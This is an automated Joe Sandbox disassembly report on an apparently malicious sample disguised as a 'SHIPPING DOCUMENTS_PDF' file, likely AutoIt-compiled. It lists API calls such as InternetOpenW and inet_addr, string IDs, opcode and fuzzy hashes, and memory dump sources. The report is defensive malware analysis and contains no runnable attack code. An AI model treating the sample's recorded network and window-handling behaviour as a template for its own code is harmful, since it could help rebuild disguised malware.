                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 2783356886-2766056989
                                                                                    • Opcode ID: 943f2a2cc9b28e1e9cecdf5deaa5469e528a2c157a67883f8e84dbce0726019e
                                                                                    • Instruction ID: 98bb8d7a6d1f628836663cba2e255096d602cf4398d5f92825640ac3058f915c
                                                                                    • Opcode Fuzzy Hash: 943f2a2cc9b28e1e9cecdf5deaa5469e528a2c157a67883f8e84dbce0726019e
                                                                                    • Instruction Fuzzy Hash: B75137715087449BD320EF10D886BAFBBE8FB85345F41889DF6D8520A1DF71852DCB66
                                                                                    APIs
                                                                                      • Part of subcall function 00B54F0B: __fread_nolock.LIBCMT ref: 00B54F29
                                                                                    • _wcscmp.LIBCMT ref: 00BB9824
                                                                                    • _wcscmp.LIBCMT ref: 00BB9837
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                    • String ID: FILE
                                                                                    • API String ID: 4029003684-3121273764
                                                                                    • Opcode ID: 5cf7354c7ed0bc95bd8a7aa3d333347544f90907cda6870c0d07208bcca9dc82
                                                                                    • Instruction ID: 4d8f2a1c969d5c018ec2dc8628d1e22a5d5dd091499e4de9f69331b860eea55a
                                                                                    • Opcode Fuzzy Hash: 5cf7354c7ed0bc95bd8a7aa3d333347544f90907cda6870c0d07208bcca9dc82
                                                                                    • Instruction Fuzzy Hash: A041A771A00209BBDF219AA4CC86FEFBBF9DF85714F0044E9FA05A7181DBB199458B61
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BC259E
                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00BC25D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CrackInternet_memset
                                                                                    • String ID: |
                                                                                    • API String ID: 1413715105-2343686810
                                                                                    • Opcode ID: 72a687bfd0e66dc49784b19469873709d59c62401b11ff46260eb651c0f462dd
                                                                                    • Instruction ID: ba7e153ac77f96cd844b93e29dd6b7aa97e422f9740e94972b472a0a68c6d8c1
                                                                                    • Opcode Fuzzy Hash: 72a687bfd0e66dc49784b19469873709d59c62401b11ff46260eb651c0f462dd
                                                                                    • Instruction Fuzzy Hash: 68310771900119ABCF11EFA4DC85EEEBFB9FF08310F1040A9FD15A6162EA315A56DB60
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00BD7B61
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD7B76
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: '
                                                                                    • API String ID: 3850602802-1997036262
                                                                                    • Opcode ID: fb179769f7145fcb260a652d21938c86bdf875bc1afb45240eac448090361244
                                                                                    • Instruction ID: fcd08ca8be205e14b70a1c108980abb88bd4a4dfe248e958f3563e61abce90b6
                                                                                    • Opcode Fuzzy Hash: fb179769f7145fcb260a652d21938c86bdf875bc1afb45240eac448090361244
                                                                                    • Instruction Fuzzy Hash: C0410874A4520A9FDB14CF64D891BEABBF5FB09304F1041AAE904AB391FB70A951CF90
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00BD6B17
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BD6B53
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$DestroyMove
                                                                                    • String ID: static
                                                                                    • API String ID: 2139405536-2160076837
                                                                                    • Opcode ID: 228adba1ea41778561a42907ba75e8d4c75221d7fd9b3861b8962cf53816bf4f
                                                                                    • Instruction ID: a0cb687115e5efad7e0cac0757cc80d166c39a5dd111deb3d2bae66114882b7a
                                                                                    • Opcode Fuzzy Hash: 228adba1ea41778561a42907ba75e8d4c75221d7fd9b3861b8962cf53816bf4f
                                                                                    • Instruction Fuzzy Hash: A4316E71100604AEDB109F64CC91BFBB7E9FF48760F10856AF9A5D7290EA35AC51C760
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BB2911
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BB294C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: 0655dda8289c5e7c3f28be1c6207e88864f546cdb168880164d9c66924c42169
                                                                                    • Instruction ID: f64b5d9b2f178cf08e294511170e92a3c9342414f440a12902875c83c03271dc
                                                                                    • Opcode Fuzzy Hash: 0655dda8289c5e7c3f28be1c6207e88864f546cdb168880164d9c66924c42169
                                                                                    • Instruction Fuzzy Hash: 1931C131A003059BEB24DF58DD85BFEBBF8EF46350F1440B9E9D9A61A0D7B09940CB51
                                                                                    APIs
                                                                                    • __snwprintf.LIBCMT ref: 00BC3A66
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __snwprintf_memmove
                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                    • API String ID: 3506404897-2584243854
                                                                                    • Opcode ID: 3ebb3cf2af42f6a41a6c25069b67f4b08c193fce4b40837868a80ee3aeb40690
                                                                                    • Instruction ID: 926ce9b5aba25c0c330b4996a621f99b9cc593c0b07114f68c574f9f1cc37ac8
                                                                                    • Opcode Fuzzy Hash: 3ebb3cf2af42f6a41a6c25069b67f4b08c193fce4b40837868a80ee3aeb40690
                                                                                    • Instruction Fuzzy Hash: ED218C71700219AACF14EF64CC82FAE77F5EF48700F4084E9F945AB281DA30EA59CB61
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BD6761
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD676C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Combobox
                                                                                    • API String ID: 3850602802-2096851135
                                                                                    • Opcode ID: 0cde7445c740b3113027285d1cb2c28290cfefa86b43c0cc0570061d2ab66f51
                                                                                    • Instruction ID: f37654120aac28c6a340181e563cbef4a07a85dd992ffa248dba4cb516abaa8c
                                                                                    • Opcode Fuzzy Hash: 0cde7445c740b3113027285d1cb2c28290cfefa86b43c0cc0570061d2ab66f51
                                                                                    • Instruction Fuzzy Hash: 4F119071300209AFEF15CF54CC81EABB7AAEB983A8F10416AF91497391E635DC5187A0
                                                                                    APIs
                                                                                      • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                                                      • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                                                      • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00BD6C71
                                                                                    • GetSysColor.USER32(00000012), ref: 00BD6C8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                    • String ID: static
                                                                                    • API String ID: 1983116058-2160076837
                                                                                    • Opcode ID: bc81ecbc88c7368ff073d5ea03b33a5aa191c6513b6fb3a203e946ba13cb9b14
                                                                                    • Instruction ID: 466386e1cace4c381d7fc4a2fe2c88c3ad7024bc50b04fc2b8711d2447821327
                                                                                    • Opcode Fuzzy Hash: bc81ecbc88c7368ff073d5ea03b33a5aa191c6513b6fb3a203e946ba13cb9b14
                                                                                    • Instruction Fuzzy Hash: 4B211A7262020AAFDB04DFA8CC45AFABBE8FB08315F044569FD55D3250E635E850DB60
                                                                                    APIs
                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00BD69A2
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BD69B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                    • String ID: edit
                                                                                    • API String ID: 2978978980-2167791130
                                                                                    • Opcode ID: 2673d650f51f1f12aa7e4ed911aeff428096bf8294fceca37710ddcfd3f879e1
                                                                                    • Instruction ID: db45d9faa89389073e63347dcfaec7434a9e2891f5eaf764d512495cfe36dd8c
                                                                                    • Opcode Fuzzy Hash: 2673d650f51f1f12aa7e4ed911aeff428096bf8294fceca37710ddcfd3f879e1
                                                                                    • Instruction Fuzzy Hash: F9119D71100109ABEB108E649C60AFBB7A9EB19378F504766F9A1972E0E739DC509760
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BB2A22
                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00BB2A41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: e5fa24d8b16200bf6359a011e8c6e1a966022f97092022c0fc64035b1b668513
                                                                                    • Instruction ID: 7e2c00222a29e0f5276e1f26d8530223b34ac3ef30a97d4928e4d6b0e729e693
                                                                                    • Opcode Fuzzy Hash: e5fa24d8b16200bf6359a011e8c6e1a966022f97092022c0fc64035b1b668513
                                                                                    • Instruction Fuzzy Hash: D9119072901114EBDB35EB98DC44BFE77E8EB86314F1440A1E859E7290D7B0AD0ACB92
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BC222C
                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BC2255
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$OpenOption
                                                                                    • String ID: <local>
                                                                                    • API String ID: 942729171-4266983199
                                                                                    • Opcode ID: 7f81a6045521b15a2027f6f98b5a4047911bc91a814b4494825d127dc1312507
                                                                                    • Instruction ID: 7e543f8c405227b18426c216c04ec2b434db76804af2c48ad099cb98ba4e1d4e
                                                                                    • Opcode Fuzzy Hash: 7f81a6045521b15a2027f6f98b5a4047911bc91a814b4494825d127dc1312507
                                                                                    • Instruction Fuzzy Hash: AE11CE70501226BADB298F118C84FFAFBE8FB06361F10826EF9059A000E2705D80D6F0
                                                                                    APIs
                                                                                      • Part of subcall function 00BC7FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00BC7DB3,?,00000000,?,?), ref: 00BC800D
                                                                                    • inet_addr.WSOCK32(00000000), ref: 00BC7DB6
                                                                                    • htons.WSOCK32(00000000), ref: 00BC7DF3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                    • String ID: 255.255.255.255
                                                                                    • API String ID: 2496851823-2422070025
                                                                                    • Opcode ID: e6f1a2a8424deb2a2f88f5e18675c18e77746c94e230c6cb0e17d8b7ae8f790f
                                                                                    • Instruction ID: ab0e72432551a8c88d032cc9805111878e092a73b01702807bb93f6738f9e7c8
                                                                                    • Opcode Fuzzy Hash: e6f1a2a8424deb2a2f88f5e18675c18e77746c94e230c6cb0e17d8b7ae8f790f
                                                                                    • Instruction Fuzzy Hash: DA11A575548206ABCB20AF64CC86FBEB3A5FF04320F1085AAE912572D1DF71AC14DB91
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00BA8E73
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 372448540-1403004172
                                                                                    • Opcode ID: bdb3b6076dfa50ed4cc06dcfc208bc55308ae193bd7ec7149c1aa7902f681f02
                                                                                    • Instruction ID: bf7f5557e49c6cace960f772e058fa56a64f5481f94ab5ad0401f0794fc61e5d
                                                                                    • Opcode Fuzzy Hash: bdb3b6076dfa50ed4cc06dcfc208bc55308ae193bd7ec7149c1aa7902f681f02
                                                                                    • Instruction Fuzzy Hash: 9B01F5B1A49219EBCB15EBA0CC919FE73E8EF06320B0046A9BC21672E1DE35580CC660
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock_memmove
                                                                                    • String ID: EA06
                                                                                    • API String ID: 1988441806-3962188686
                                                                                    • Opcode ID: e9cbaf69a482676eb140650cebe5f6e92e69f76b1b94ddb2b78bc0fbe1f2552e
                                                                                    • Instruction ID: e023149b6c1b871992c1d28fb42625d6b2364027c00348aa7e5faa9fefdcb30a
                                                                                    • Opcode Fuzzy Hash: e9cbaf69a482676eb140650cebe5f6e92e69f76b1b94ddb2b78bc0fbe1f2552e
                                                                                    • Instruction Fuzzy Hash: C301D6718042186EDB28DAA8C856EFE7BFCDB11301F0081AFF596D2181E9B5A6088B60
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00BA8D6B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 372448540-1403004172
                                                                                    • Opcode ID: 362cf36d4b3359c379e3e149c28dd68c484b3bf803941875d945cd8874b01320
                                                                                    • Instruction ID: 296a4ebf55f41b78ca4582888f35d796164f0de5b4b232a48e7111c88aa3d984
                                                                                    • Opcode Fuzzy Hash: 362cf36d4b3359c379e3e149c28dd68c484b3bf803941875d945cd8874b01320
                                                                                    • Instruction Fuzzy Hash: F001D4B1B45109ABCB15EBA0C996AFE73E8DF16300F1041B9B842672E1DE255E0CD271
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00BA8DEE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 372448540-1403004172
                                                                                    • Opcode ID: c1657824a5003c8e64507cd234804ed40d91e38d2824614faa9eec8b754c9cc0
                                                                                    • Instruction ID: d000c5a8d6399b993819b24f87c94642722d2523dfab1dd73b17bb7539049d9c
                                                                                    • Opcode Fuzzy Hash: c1657824a5003c8e64507cd234804ed40d91e38d2824614faa9eec8b754c9cc0
                                                                                    • Instruction Fuzzy Hash: 6201F2B1B49109A7CB25EAA4C992AFE77E8CF16300F1041A9BC42772E2DE255E0CD271
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp
                                                                                    • String ID: #32770
                                                                                    • API String ID: 2292705959-463685578
